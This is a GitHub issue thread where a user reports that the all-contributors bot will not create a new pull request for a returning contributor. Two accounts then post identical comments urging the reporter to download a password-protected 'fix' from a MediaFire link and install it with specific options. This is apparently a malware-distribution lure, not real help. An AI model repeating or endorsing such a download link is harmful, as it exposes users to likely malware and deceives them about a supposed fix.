### ISSUE TITLE
Bot is not raising New PR of the Contributor if his/her already Contribute 

### ISSUE THREAD

**Issue by ujjwalshriv3** [all-contributors/app#501]
**Describe the bug**
how to overwrite this. when the  contributor provided wrong pr before so I have to close it. now its right issue but bot not creating new PR that was the issue is the bot  that why happen already contributed before to review below i have attached Screenshot 👇
please figure it out, we cant figure out why bot doing this, it a bug need time to fix it .

**To Reproduce**

1. Go to ' issue tab if someone is already contributed before to review'  
2. Click on 'Create New issue'
3. Scroll down to 'in the comment section of issue '
4. See error the bot is not create a new PR of the Contributor 

**Expected behavior**

**Screenshots** 
![Screenshot 2024-08-24 130723](https://github.com/user-attachments/assets/49f22dfc-d239-4ee6-8c75-4c4882447a3c)

**Additional context**

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
